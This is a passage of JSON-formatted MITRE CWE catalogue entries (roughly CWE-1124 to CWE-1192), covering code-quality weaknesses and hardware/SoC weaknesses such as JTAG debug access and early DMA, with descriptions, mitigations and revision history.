Relationships"}}},"1124":{"attr":{"@_ID":"1124","@_Name":"Excessively Deep Nesting","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a callable or other code grouping in which\\n\\t\\t\\t\\t\\tthe nesting / branching is too deep.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1125":{"attr":{"@_ID":"1125","@_Name":"Excessive Attack Surface","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product has an attack surface whose quantitative\\n\\t\\t\\t\\t\\tmeasurement exceeds a desirable maximum.","Extended_Description":{"xhtml:p":"Originating from software security, an \\"attack surface\\" measure typically reflects the number of input points and output points that can be utilized by an untrusted party, i.e. a potential attacker. A larger attack surface provides more places to attack, and more opportunities for developers to introduce weaknesses.  In some cases, this measure may reflect other aspects of quality besides security; e.g., a product with many inputs and outputs may require a large number of tests in order to improve code coverage."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-966"}},{"attr":{"@_External_Reference_ID":"REF-967"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1126":{"attr":{"@_ID":"1126","@_Name":"Declaration of Variable with Unnecessarily Wide Scope","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code declares a variable in one scope, but the\\n\\t\\t\\t\\t\\tvariable is only used within a narrower scope.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1127":{"attr":{"@_ID":"1127","@_Name":"Compilation with Insufficient Warnings or Errors","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code is compiled without sufficient warnings enabled, which\\n\\t\\t\\t\\t\\tmay prevent the detection of subtle bugs or quality\\n\\t\\t\\t\\t\\tissues.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Build and Compilation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1164":{"attr":{"@_ID":"1164","@_Name":"Irrelevant Code","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program contains code that is not essential for execution,\\n\\t     i.e. makes no state changes and has no side effects that alter\\n\\t     data or control flow, such that removal of the code would have no impact\\n\\t     to functionality or correctness.","Extended_Description":{"xhtml:p":"Irrelevant code could include dead code,\\n\\t     initialization that is not used, empty blocks, code that could be entirely\\n\\t     removed due to optimization, etc."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Reduce Reliability"},{"Scope":"Other","Impact":"Reduce Performance"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-01-02"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1173":{"attr":{"@_ID":"1173","@_Name":"Improper Use of Validation Framework","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application does not use, or incorrectly uses, an input validation framework that is provided by the source language or an independent library.","Extended_Description":"Many modern coding languages provide developers with input validation frameworks to make the task of input validation easier and less error-prone. These frameworks will automatically check all input against specified criteria and direct execution to error handlers when invalid input is received. The improper use (i.e., an incorrect implementation or missing altogether) of these frameworks is not directly exploitable, but can lead to an exploitable condition if proper input validation is not performed later in the application. Not using provided input validation frameworks can also hurt the maintainability of code as future developers may not recognize the downstream input validation being used in the place of the validation framework.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness may occur when software designers choose to not leverage input validation frameworks provided by the source language."},{"Phase":"Implementation","Note":"This weakness may occur when developers do not correctly use a provided input validation framework."}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Note":"Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others."}},"Detection_Methods":{"Detection_Method":{"attr":{"@_Detection_Method_ID":"DM-3"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Some instances of improper input validation can be detected using automated static analysis.","A static analysis tool might allow the user to specify which application-specific methods or functions perform input validation; the tool might also have built-in knowledge of validation frameworks such as Struts. The tool may then suppress or de-prioritize any associated warnings. This allows the analyst to focus on areas of the software in which input validation does not appear to be present.","Except in the cases described in the previous paragraph, automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes."]}}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Properly use provided input validation frameworks."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-12-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}]}},"1174":{"attr":{"@_ID":"1174","@_Name":"ASP.NET Misconfiguration: Improper Model Validation","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The ASP.NET application does not use, or incorrectly uses, the model validation framework.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Note":"Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-12-21"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1176":{"attr":{"@_ID":"1176","@_Name":"Inefficient CPU Computation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program performs CPU computations using\\n         algorithms that are not as efficient as they could be for the\\n         needs of the developer, i.e., the computations can be\\n         optimized further.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly, possibly in ways that are noticeable to the users.  If an attacker can influence the amount of computation that must be performed, e.g. by triggering worst-case complexity, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)"},{"Scope":"Other","Impact":"Reduce Performance"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1008"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-01-03"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1177":{"attr":{"@_ID":"1177","@_Name":"Use of Prohibited Code","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a function, library, or third party component\\n\\t     that has been explicitly prohibited, whether by the developer or\\n\\t     the customer.","Extended_Description":{"xhtml:p":["The developer - or customers - may wish to restrict or eliminate use of a function, library, or third party component for any number of reasons, including real or suspected vulnerabilities; difficulty to use securely; export controls or license requirements; obsolete or poorly-maintained code; internal code being scheduled for deprecation; etc.","To reduce risk of vulnerabilities, the developer might maintain a list of \\"banned\\" functions that programmers must avoid using because the functions are difficult or impossible to use securely.  This issue can also make the software more costly and difficult to maintain."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1009"}},{"attr":{"@_External_Reference_ID":"REF-1010"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-01-03"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}}},"1187":{"attr":{"@_ID":"1187","@_Name":"DEPRECATED: Use of Uninitialized Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-908. All content has been transferred to CWE-908.","Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-03-25"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships, Type, Weakness_Ordinalities"},"Previous_Entry_Name":{"#text":"Use of Uninitialized Resource","attr":{"@_Date":"2020-02-24"}}}},"1188":{"attr":{"@_ID":"1188","@_Name":"Insecure Default Initialization of Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software initializes or sets a resource with a default that is intended to be changed by the administrator, but the default is not secure.","Extended_Description":{"xhtml:p":"Developers often choose default values that leave the software as open and easy to use as possible out-of-the-box, under the assumption that the administrator can (or should) change the default value.  However, this ease-of-use comes at a cost when the default is insecure and the administrator does not change it."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"665"}}},"Notes":{"Note":{"#text":"This entry improves organization of concepts under initialization.  The typical CWE model is to cover \\"Missing\\" and \\"Incorrect\\" behaviors.  Arguably, this entry could be named as \\"Incorrect\\" instead of \\"Insecure.\\"  This might be changed in the near future.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-03-25"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1189":{"attr":{"@_ID":"1189","@_Name":"Improper Isolation of Shared Resources on System-on-a-Chip (SoC)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The System-On-a-Chip (SoC) does not properly isolate shared resources between trusted and untrusted agents.","Extended_Description":{"xhtml:p":"A System-On-a-Chip (SoC) has a lot of functionality, but it may have a limited number of pins or pads. A pin can only perform one function at a time. However, it can be configured to perform multiple different functions. This technique is called pin multiplexing. Similarly, several resources on the chip may be shared to multiplex and support different features or functions. When such resources are shared between trusted and untrusted agents, untrusted agents may be able to access the assets intended to be accessed only by the trusted agents."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"653","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1331","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If resources being used by a trusted user are shared with an untrusted user, the untrusted user may be able to modify the functionality of the shared resource of the trusted user."},{"Scope":"Integrity","Impact":"Quality Degradation","Note":"The functionality of the shared resource may be intentionally degraded."}]},"Detection_Methods":{"Detection_Method":{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"Kernel integrity verification can help identify when shared resource configuration settings have been modified."},"Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["When sharing resources, avoid mixing agents of varying trust levels.","Untrusted agents should not share resources with trusted agents."]}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the following SoC\\n\\t      design. The Hardware Root of Trust (HRoT) local SRAM is memory mapped in the core{0-N}\\n\\t      address space. The HRoT allows or disallows access to private memory ranges, thus\\n\\t      allowing the sram to function as a mailbox for communication between untrusted and\\n\\t      trusted HRoT partitions.","Body_Text":{"xhtml:img":{"attr":{"@_src":"https://cwe.mitre.org/data/images/HRoT-CWE.png","@_alt":"Hardware Root of Trust"}},"xhtml:p":"We assume that the threat is from malicious software in\\n\\t      the untrusted domain. We assume this software has access\\n\\t      to the core{0-N} memory map and can be running at any\\n\\t      privilege level on the untrusted cores. The capability\\n\\t      of this threat in this example is communication to and\\n\\t      from the mailbox region of SRAM modulated by the\\n\\t      hrot_iface. To address this threat, information must not\\n\\t      enter or exit the shared region of SRAM through\\n\\t      hrot_iface when in secure or privileged mode."}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-6260","Description":"Baseboard Management Controller (BMC) device implements Advanced High-performance Bus (AHB) bridges that do not require authentication for arbitrary read and write access to the BMC\'s physical address space from the host, and possibly the network [REF-1138].","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6260"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"124"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1036"}},{"attr":{"@_External_Reference_ID":"REF-1138"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}],"Contribution":[{"attr":{"@_Type":"Content"},"Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-07-16","Contribution_Comment":"Provided Demonstrative Example for Hardware Root of Trust"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"provided observed example"}],"Previous_Entry_Name":{"#text":"Improper Isolation of Shared Resources on System-on-Chip (SoC)","attr":{"@_Date":"2020-08-20"}}}},"1190":{"attr":{"@_ID":"1190","@_Name":"DMA Device Enabled Too Early in Boot Phase","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product enables a Direct Memory Access (DMA) capable device before the security configuration settings are established, which allows an attacker to extract data from or gain privileges on the product.","Extended_Description":{"xhtml:p":"DMA is included in a number of devices because it allows\\n              data transfer between the computer and the connected device, using\\n              direct hardware access to read or write directly to main memory\\n              without any OS interaction. An attacker could exploit this to\\n              access secrets. Several virtualization-based mitigations have been introduced to thwart DMA attacks. These are usually\\n              configured/setup during boot time. However, certain IPs that are\\n              powered up before boot is complete (known as early boot IPs) may\\n              be DMA capable. Such IPs, if not trusted, could launch DMA\\n              attacks and gain access to assets that should otherwise be\\n              protected."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Modify Memory"],"Likelihood":"High","Note":"DMA devices have direct write access to main memory and\\n                 due to time of attack will be able to bypass OS or Bootloader\\n                 access control."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Utilize an IOMMU to orchestrate IO access from\\n                 the start of the boot process."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1038"}},{"attr":{"@_External_Reference_ID":"REF-1039"}},{"attr":{"@_External_Reference_ID":"REF-1040"}},{"attr":{"@_External_Reference_ID":"REF-1041"}},{"attr":{"@_External_Reference_ID":"REF-1042"}},{"attr":{"@_External_Reference_ID":"REF-1044"}},{"attr":{"@_External_Reference_ID":"REF-1046"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1191":{"attr":{"@_ID":"1191","@_Name":"On-Chip Debug and Test Interface With Improper Access Control","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The chip does not implement or does not correctly perform access control to check whether users are authorized to access internal registers and test modes through the physical debug/test interface.","Extended_Description":{"xhtml:p":["A device\'s internal information may be accessed through a scan chain of interconnected internal registers, usually through a JTAG interface. The JTAG interface provides access to these registers in a serial fashion in the form of a scan chain for the purposes of debugging programs running on a device. Since almost all information contained within a device may be accessed over this interface, device manufacturers typically insert some form of authentication and authorization to prevent unintended use of this sensitive information. This mechanism is implemented in addition to on-chip protections that are already present.","If authorization, authentication, or some other form of access control is not implemented or not implemented correctly, a user may be able to bypass on-chip protection mechanisms through the debug interface."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Likelihood":"High"},{"Scope":"Confidentiality","Impact":"Read Memory","Likelihood":"High"},{"Scope":"Authorization","Impact":"Execute Unauthorized Code or Commands","Likelihood":"High"},{"Scope":"Integrity","Impact":"Modify Memory","Likelihood":"High"},{"Scope":"Integrity","Impact":"Modify Application Data","Likelihood":"High"},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Likelihood":"High"}]},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"Authentication and authorization of debug and test interfaces should be part of the architecture and design review process. Withholding of private register documentation from the debug and test interface public specification (\\"Security by obscurity\\") should not be considered as sufficient security."}},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"Dynamic tests should be done in the pre-silicon and post-silicon stages to verify that the debug and test interfaces are not open by default."}},{"Method":"Fuzzing","Description":"Tests that fuzz Debug and Test Interfaces should ensure that no access without appropriate authentication and authorization is possible.","Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"If feasible, the manufacturer should disable the JTAG interface or implement authentication and authorization for the JTAG interface. If authentication logic is added, it should be resistant to timing attacks. Security-sensitive data stored in registers, such as keys, etc. should be cleared when entering debug mode.","Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A home, WiFi-router device implements a login prompt which prevents an unauthorized user from issuing any commands on the device until appropriate credentials are provided. The credentials are protected on the device and are checked for strength against attack.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:p":["If the JTAG interface on this device is not hidden by the manufacturer, the interface may be identified using tools such as JTAGulator. If it is hidden but not disabled, it can be exposed by physically wiring to the board.",{"#text":"By issuing acommand before the OS starts, the unauthorized user pauses the watchdog timer and prevents the router from restarting (once the watchdog timer would have expired). Having paused the router, an unauthorized user is able to execute code and inspect and modify data in the device, even extracting all of the router\'s firmware. This allows the user to examine the router and potentially exploit it.","xhtml:b":"halt"}]},{"#text":"In order to prevent exposing the debugging interface, manufacturers might try to obfuscate the JTAG interface or blow device internal fuses to disable the JTAG interface. Adding authentication and authorization to this interface makes use by unauthorized individuals much more difficult.","attr":{"@_Nature":"good","@_Language":"Other"}}],"Body_Text":"JTAG is useful to chip and device manufacturers during design, testing, and production and is included in nearly every product. Without proper authentication and authorization, the interface may allow tampering with a product."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-18827","Description":"chain: JTAG interface is not disabled (CWE-1191) during ROM code execution, introducing a race condition (CWE-362) to extract encryption keys","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18827"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1037"}},{"attr":{"@_External_Reference_ID":"REF-1043"}},{"attr":{"@_External_Reference_ID":"REF-1084"}},{"attr":{"@_External_Reference_ID":"REF-1085"}}]},"Notes":{"Note":{"#text":"CWE-1191 and CWE-1244 both involve physical debug access,\\n\\t  but the weaknesses are different. CWE-1191 is effectively\\n\\t  about missing authorization for a debug interface,\\n\\t  i.e. JTAG.  CWE-1244 is about providing internal assets with\\n\\t  the wrong debug access level, exposing the asset to\\n\\t  untrusted debug agents.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Contribution":[{"attr":{"@_Type":"Content"},"Contribution_Name":"Parbati K. Manna","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-18","Contribution_Comment":"provided detection methods"},{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Narasimha Kumar V Mangipudi","Contribution_Organization":"Lattice Semiconductor","Contribution_Date":"2021-10-20","Contribution_Comment":"reviewed content changes"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"clarified differences between CWE-1191 and CWE-1244"}],"Previous_Entry_Name":[{"#text":"Exposed Chip Debug Interface With Insufficient Access Control","attr":{"@_Date":"2020-02-26"}},{"#text":"Exposed Chip Debug and or Test Interface With Insufficient Access Control","attr":{"@_Date":"2020-08-20"}}]}},"1192":{"attr":{"@_ID":"1192","@_Name":"System-on-Chip (SoC) Using Components without Unique, Immutable Identifiers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The System-on-Chip (SoC) does not have unique, immutable identifiers for each of its components.","Extended_Description":{"xhtml:p":["A System-on-Chip (SoC) comprises several components (IP) with varied\\n           trust requirements. It is required that each IP is identified\\n           uniquely and should distinguish itself from other entities in\\n           the SoC without any ambiguity. The unique secured identity is\\n           required for various purposes. Most of the time the identity is used\\n           to route a transaction or perform certain actions, including \\n           resetting, retrieving a sensitive information, and acting upon or on\\n           behalf of something else.","There are several variants of this weakness:"],"xhtml:ul":{"xhtml:li":["A \\"missing\\" identifier is when the SoC does not define\\n\\t      any mechanism to uniquely identify the IP.","An \\"insufficient\\" identifier might provide\\n\\t      some defenses - for example, against the most common\\n\\t      attacks - but it does not protect against everything\\n\\t      that is intended.","A \\"misconfigured\\" mechanism occurs when a mechanism\\n              is available but not implemented correctly.","An \\"ignored\\" identifier occurs when the SoC/IP has not applied\\n\\t      any policies or does not act upon the identifier securely."]}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and 